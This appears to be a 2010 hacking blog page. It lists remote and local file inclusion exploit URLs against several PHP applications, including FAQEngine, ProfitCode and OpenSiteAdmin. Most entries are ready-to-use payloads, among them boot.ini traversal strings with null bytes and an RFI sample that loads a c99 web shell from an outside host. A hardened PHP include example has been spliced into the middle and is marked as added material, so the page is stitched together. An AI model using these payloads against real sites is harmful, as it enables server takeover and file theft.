phpPollScript <= 1.3 Remote File Include Vulnerability
January 16, 2010, 6:41 am
Filed under: Hack | Tags: bot, exploits, Hack, hacking, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
/php/init.poll.php?include_class=
phpAutoMembersArea 3.2.5 ($installed_config_file) Remote File Inclusion
January 16, 2010, 5:41 am
Filed under: Hack | Tags: bot, exploits, Hack, hacking, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
+ PoC:
+ http://[target]/auto_check_renewals.php?installed_config_file=
Develooping Flash Chat (banned_file) Remote File Inclusion
January 16, 2010, 5:39 am
Filed under: Hack | Tags: bot, exploits, Hack, hacking, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
Remote File Include :
http://www.target.com/path/chat/adminips.php?banned_file=CmdShell
FAQEngine 4.24.00 – Remote File Inclusion vulnerability [ RFI ]
January 15, 2010, 2:08 pm
Filed under: Hack | Tags: bot, exploits, Hack, hacking, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
http://127.0.0.1/[kaMtiEz]/attachs.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/backup.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/badwords.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/categories.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/changepw.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/colorchooser.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/colorwheel.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/dbfiles.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/diraccess.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/faq.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/index.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/kb.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/stats.php?path_faqe=[INDONESIANCODER]
ProfitCode Shopping Cart Multiple LFI/RFI Vulnerabilities
January 13, 2010, 10:54 am
Filed under: Hack | Tags: bot, exploits, Hack, hacking, LFI, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
- There are a couple of pages that have the LFI vuln
Vuln c0de : dl-authcontent.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$returlvar = "dloads";
include "$docroot" . "tplates/usrauthlogin.php";
exit;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit :
http://server/store/dloads/dloadsmainincs/dl-authcontent.php?docroot=[LFI]
Sample :
http://server/store/dloads/dloadsmainincs/dl-authcontent.php?docroot=../../../../../boot.ini%00
***************************************************************************************************
Vuln c0de : dl-maincatsearch-dlcontent.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
include("$docroot" . "shopincs/catpgtop$langFile.php");
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit
http://server/store/dloads/dloadsmainincs/dl-maincatsearch-dlcontent.php?docroot=[LFI]
Sample
http://server/store/dloads/dloadsmainincs/dl-maincatsearch-dlcontent.php?docroot=../../../../../boot.ini%00
Vuln c0de : dloads-payed.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
include "$docroot" . "tplates/usrauthlogin.php";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit
http://server/store/dloads/dloadstplates/dloads-payed.php?docroot=[LFI]
Sample
http://server/store/dloads/dloadstplates/dloads-payed.php?docroot=.../../../../../../../../boot.ini%00
************************************************************************
- For some reason this one comes up as an RFI
Vuln c0de : dloads-header.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
include "$docroot" . "dloads/dloadsmainincs/inc-dloadsfunctions.php";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit
http://server/store/dloads/dloads-header.php?docroot=[RFI]
Sample
http://server/store/dloads/dloads-header.php?docroot=http://www.cfsm.cn/c99.txt?%00
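A hardened form of the include pattern in the ProfitCode snippets above, as an added example that is not ProfitCode's code or part of the original post. It assumes `$docroot` reaches these scripts from the query string (for example through `register_globals`); `APP_ROOT`, `TEMPLATES` and `resolve_template()` are hypothetical names.

```php
<?php
// Added example (not ProfitCode's code). APP_ROOT, TEMPLATES and
// resolve_template() are hypothetical names chosen for illustration.
// Written for PHP 7 or later.
//
// php.ini settings that remove the preconditions on older installs:
//   register_globals  = Off   ; request parameters no longer become variables
//   allow_url_include = Off   ; include/require refuse http:// and ftp:// paths

// The base directory is a constant set in code, so ?docroot= cannot replace it.
define('APP_ROOT', __DIR__);

// Fixed allow-list: request input may select a key, never a path.
const TEMPLATES = [
    'login'  => 'tplates/usrauthlogin.php',
    'dloads' => 'dloads/dloadsmainincs/inc-dloadsfunctions.php',
];

function resolve_template(string $key): string
{
    if (!array_key_exists($key, TEMPLATES)) {
        throw new InvalidArgumentException('unknown template key');
    }
    $base = realpath(APP_ROOT);
    // realpath() collapses ../ sequences and returns false for URLs and
    // for files that do not exist.
    $path = realpath(APP_ROOT . '/' . TEMPLATES[$key]);
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('template outside application root');
    }
    return $path;
}

// Vulnerable form from the page:
//   include "$docroot" . "tplates/usrauthlogin.php";
// Hardened form: the path is built only from the constant and the allow-list.
try {
    include resolve_template('login');
} catch (Exception $e) {
    http_response_code(404);
    exit;
}
```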
OpenSiteAdmin 0.9.7b (pageHeader.php path) RFI Vulnerability
January 13, 2010, 10:50 am
Filed under: Hack | Tags: bot, exploits, Hack, hacking, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
[@]=====================================================================================================[@]
[+] 3rr0r Bu9 : - pageHeader.php
[@]=====================================================================================================[@]
[+] 3xpl0it : http://127.0.0.1/OpenSiteAdmin/pages/pageHeader.php?path=[thanks.txt?]
[@]=====================================================================================================[@]